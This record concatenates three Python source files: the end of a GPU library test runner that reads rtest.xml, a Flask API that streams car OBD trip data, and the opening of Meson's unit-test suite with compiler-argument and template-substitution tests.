cmdline = find_cmd(cmd_parts[0]) + " " + cmd[len(cmd_parts[0]):]
test_proc = subprocess.Popen(cmdline, text=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
if time_limit > 0:
start = time.monotonic()
#p = multiprocessing.Process(target=time_stop, args=(start, test_proc.pid))
p = TimerProcess(start, time_limit, test_proc.pid)
p.start()
while True:
output = test_proc.stdout.readline()
if output == '' and test_proc.poll() is not None:
break
elif output:
outstring = output.strip()
print (outstring)
error = error or re.search(fail_regex, outstring, re.IGNORECASE)
status = test_proc.poll()
if time_limit > 0:
p.stop()
p.join()
timeout = p.stopped()
print(f"timeout {timeout}")
if error:
status = 1
elif timeout:
status = 2
else:
status = test_proc.returncode
except:
import traceback
exc = traceback.format_exc()
print( "Python Exception: {0}".format(exc) )
status = 3
return status
def batch(script, xml):
global OS_info
global args
global fail_regex
#
cwd = pathlib.os.curdir
rtest_cwd_path = os.path.abspath( os.path.join( cwd, 'rtest.xml') )
if os.path.isfile(rtest_cwd_path) and os.path.dirname(rtest_cwd_path).endswith( "staging" ):
# if in a staging directory then test locally
test_dir = cwd
else:
build_type = "debug" if args.debug else "release"
search_paths = [
f"{args.install_dir}//{build_type}//clients//staging",
f"{args.install_dir}//{build_type}//test",
f"{args.install_dir}"
]
test_dir = ""
for path_option in search_paths:
if os.path.exists(path_option):
test_dir = path_option
break
if test_dir == "":
print(f"ERROR: Could not determine a valid test directory. Checked {', '.join(search_paths)}.")
return 2
fail = False
for i in range(len(script)):
cmdline = script[i]
xcmd = cmdline.replace('%IDIR%', test_dir)
cmd = xcmd.replace('%ODIR%', args.output)
if cmd.startswith('tdir '):
if pathlib.Path(cmd[5:]).exists():
return 0 # all further cmds skipped
else:
continue
error = False
if cmd.startswith('%XML%'):
fileversion = xml.getElementsByTagName('fileversion')
if len(fileversion) == 0:
print("INFO: Could not find the version of this xml configuration file. Version 0.1 assumed.")
elif len(fileversion) > 1:
print("WARNING: Multiple version tags found.")
else:
version = float(fileversion[0].firstChild.data)
if version > SCRIPT_VERSION:
print(f"ERROR: This file requires script version >= {version}, have version {SCRIPT_VERSION}")
exit(1)
if xml.documentElement.hasAttribute('failure-regex'):
fail_regex = xml.documentElement.getAttribute('failure-regex')
# run the matching tests listed in the xml test file
var_subs = {}
for var in xml.getElementsByTagName('var'):
name = var.getAttribute('name')
if var.hasAttribute('value'):
val = var.getAttribute('value')
elif var.firstChild is not None:
val = var.firstChild.data
else:
val = ""
var_subs[name] = val
for name, val in args.argument.items():
var_subs[name] = val
for test in xml.getElementsByTagName('test'):
sets = test.getAttribute('sets')
runset = sets.split(',')
if len([x for x in args.test if x in runset]):
for run in test.getElementsByTagName('run'):
name = run.getAttribute('name')
vram_limit = run.getAttribute('vram_min')
if vram_limit:
if OS_info["VRAM"] < float(vram_limit):
print( f'***\n*** Skipped: {name} due to VRAM req.\n***')
continue
if name:
print( f'***\n*** Running: {name}\n***')
time_limit = run.getAttribute('time_max')
if time_limit:
timeout = float(time_limit)
else:
timeout = 0
raw_cmd = run.firstChild.data
var_cmd = raw_cmd.format_map(var_subs)
error = run_cmd(var_cmd, True, timeout)
if (error == 2):
print( f'***\n*** Timed out when running: {name}\n***')
continue
else:
error = run_cmd(cmd)
fail = fail or error
if (fail):
if (cmd == "%XML%"):
print("FAILED xml test suite!")
else:
print(f"ERROR running: {cmd}")
if (os.curdir != cwd):
os.chdir( cwd )
return 1
if (os.curdir != cwd):
os.chdir( cwd )
return 0
def run_tests():
global test_script
global xmlDoc
# install
cwd = os.curdir
xmlPath = os.path.join( cwd, 'rtest.xml')
xmlDoc = minidom.parse( xmlPath )
scripts = []
scripts.append( test_script )
for i in scripts:
if (batch(i, xmlDoc)):
#print("Failure in script. ABORTING")
if (os.curdir != cwd):
os.chdir( cwd )
return 1
if (os.curdir != cwd):
os.chdir( cwd )
return 0
def main():
global args
global timer_thread
os_detect()
args = parse_args()
status = run_tests()
if args.fail_test: status = 1
if (status):
sys.exit(status)
if __name__ == '__main__':
main()
|
api.py
|
import os
import sys
import time
import random
import subprocess
from multiprocessing import Process, Queue
from flask import Flask, Response, request, jsonify
from chunk import Chunk
from trip import Trip
from TripDB import TripDB
from OBDConnection import OBDConnection as connect
database = None
trip = None
chunk = None
obdConnection = None
def initializeData():
initTrip()
initChunk()
initDB()
connectOBD()
app = Flask(__name__)
@app.route('/start')
def start_trip():
pass
@app.route('/time')
def get_current_time():
return {
'time': time.strftime('%A %B, %d %Y %H:%M:%S'),
}
@app.route('/stream')
def getStream():
def generate():
while obdConnection.getCurrentData():
chunk.update(obdConnection.getCurrentData())
time.sleep(0.4)
yield str(obdConnection.getCurrentData())+"\n"
return Response(generate(), mimetype='application/json')
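# Example request (illustrative; assumes Flask's default development-server port):
#   curl http://localhost:5000/stream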
@app.route('/streamData')
def getCurrentData():
global chunk
if obdConnection:
current_data = obdConnection.getCurrentData()
chunk.update(current_data)
return current_data
else:
return {}
@app.route('/processedData')
def getProcessedData():
trip.update(chunk.getData())
database.updateTrip(trip.getData())
chunk.restart()
return trip.getData()
@app.route('/getTrip')
def getTrip():
return trip.getData()
@app.route('/upload')
def upload():
    return database.upload()
@app.route('/clear')
def clear():
database.clear()
return {'OK': "Cleared previous trips from local database"}
@app.route('/connectOBD')
def connectOBD():
global obdConnection
if obdConnection:
return {'OBD':"ALREADY CONNECTED"}
else:
try:
obdConnection =["something"]
obdConnection = connect()
return {"OBD": "CONNECTED"}
except:
            obdConnection = None
            print("Something went wrong while connecting to the OBD adapter")
            return {"OBD": "CONNECTION FAILED"}
def initTrip():
global trip
if not trip:
trip=Trip()
def initChunk():
global chunk
if not chunk:
chunk=Chunk()
def initDB():
global database
if not database:
database=TripDB()
some_queue = None
@app.route('/restart')
def restart():
some_queue.put("something")
return {"OK":"Quit"}
def start_flaskapp(queue):
global some_queue
some_queue = queue
initializeData()
app.run(debug=True, use_reloader=False)
if __name__ == '__main__':
# app.run(debug=True, use_reloader=False)
q = Queue()
p = Process(target=start_flaskapp, args=[q,])
p.start()
    while True:  # watch the queue: sleep while it is empty, break once a restart is requested
if q.empty():
time.sleep(1)
else:
break
    p.terminate()  # terminate the Flask app, then restart it in a subprocess
args = [sys.executable] + [sys.argv[0]]
subprocess.call(args)
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.compilers
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
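# Usage sketch (illustrative test, not part of this suite):
#   @skipIfNoExecutable('valgrind')
#   def test_run_under_valgrind(self):
#       ...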
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
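# Usage sketch (illustrative):
#   with no_pkgconfig():
#       ...  # code under test now behaves as if pkg-config were not installed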
class PatchModule:
'''
Fancy monkey-patching! Whee! Can't use mock.patch because it only
patches in the local namespace.
'''
def __init__(self, func, name, impl):
self.func = func
assert(isinstance(name, str))
self.func_name = name
self.old_impl = None
self.new_impl = impl
def __enter__(self):
self.old_impl = self.func
exec('{} = self.new_impl'.format(self.func_name))
def __exit__(self, *args):
exec('{} = self.old_impl'.format(self.func_name))
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that bad initialization fails
self.assertRaises(TypeError, cargsfunc, [])
self.assertRaises(TypeError, cargsfunc, [], [])
self.assertRaises(TypeError, cargsfunc, cc, [], [])
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(['-I.', '-I..'], cc)
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(['-I.', '-I.'], cc), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# @PLAINNAME@ and @BASENAME@ are undefined when there is more than one input
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
